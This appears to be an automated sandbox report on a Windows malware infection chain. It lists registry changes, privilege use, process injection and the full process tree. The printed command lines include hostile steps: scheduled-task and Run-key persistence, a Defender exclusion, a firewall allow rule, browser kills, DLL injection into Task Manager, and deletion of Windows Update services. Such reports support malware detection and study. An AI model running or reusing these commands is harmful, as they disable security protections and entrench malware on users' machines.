Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-651 = "AUS Central Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-741 = "New Zealand Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-451 = "Caucasus Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-365 = "Middle East Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-831 = "SA Eastern Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-721 = "Central Pacific Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-961 = "Paraguay Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-191 = "Mountain Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-131 = "US Eastern Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1022 = "Bangladesh Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-211 = "Pacific Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-222 = "Alaskan Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-141 = "Canada Central Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-372 = "Jerusalem Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-262 = "GMT Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-301 = "Romance Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-51 = "Greenland Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-72 = "Newfoundland Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-212 = "Pacific Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-751 = "Tonga Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-872 = "Pakistan Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-592 = "Malay Peninsula Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-671 = "AUS Eastern Daylight Time" C:\Windows\windefender.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = (certificate blob not reproduced) C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = (certificate blob not reproduced) C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = (certificate blob not reproduced) C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = (certificate blob not reproduced) C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = (certificate blob not reproduced) C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A (32 identical entries)
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A (5 identical entries)
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A (8 identical entries)
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A (9 identical entries)
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (2 identical entries)

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A (2 identical entries)

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A (2 identical entries)
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (5 identical entries)
Token: SeShutdownPrivilege N/A C:\Windows\System32\reg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A (6 identical entries)
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A (2 identical entries)
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A (5 identical entries)
Token: SeShutdownPrivilege N/A C:\Windows\System32\cmd.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A (2 identical entries)
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A (2 identical entries)
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A (2 identical entries)
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A (2 identical entries)
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A (2 identical entries)
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A (2 identical entries)
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A (2 identical entries)
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A (2 identical entries)
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A (2 identical entries)
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A (2 identical entries)
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A (2 identical entries)
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A (2 identical entries)
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\conhost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1332 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\fileexe.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe (4 identical entries)
PID 1332 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\fileexe.exe C:\Users\Admin\AppData\Local\Temp\oldplayer.exe (4 identical entries)
PID 1332 wrote to memory of 1868 N/A C:\Users\Admin\AppData\Local\Temp\fileexe.exe C:\Users\Admin\AppData\Local\Temp\XandETC.exe (4 identical entries)
PID 544 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe (4 identical entries)
PID 1936 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe (4 identical entries)
PID 1936 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe (4 identical entries)
PID 1564 wrote to memory of 1368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe (4 identical entries)
PID 1564 wrote to memory of 1536 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe (4 identical entries)
PID 1564 wrote to memory of 912 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe (4 identical entries)
PID 1564 wrote to memory of 2024 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe (4 identical entries)
PID 1564 wrote to memory of 1988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe (4 identical entries)
PID 1564 wrote to memory of 556 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe (4 identical entries)
PID 1372 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\system32\taskkill.exe (3 identical entries)
PID 1372 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\system32\taskkill.exe (3 identical entries)
PID 1936 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe (7 identical entries)
PID 1936 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe (3 identical entries)

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\fileexe.exe

"C:\Users\Admin\AppData\Local\Temp\fileexe.exe"

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

"C:\Users\Admin\AppData\Local\Temp\aafg31.exe"

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"

C:\Users\Admin\AppData\Local\Temp\XandETC.exe

"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:R" /E

C:\Windows\system32\taskkill.exe

taskkill /IM chrome.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM msedge.exe /F

C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe

"C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe"

C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe" & exit

C:\Windows\system32\taskeng.exe

taskeng.exe {DBA3525A-2854-4155-B645-64AF8AD39A59} S-1-5-21-3297628651-743815474-1126733160-1000:HHVWDVKF\Admin:Interactive:[1]

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "setup.exe" /f

C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe

"C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe"

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20230625102804.log C:\Windows\Logs\CBS\CbsPersist_20230625102804.cab

C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe

"C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f

C:\Windows\system32\schtasks.exe

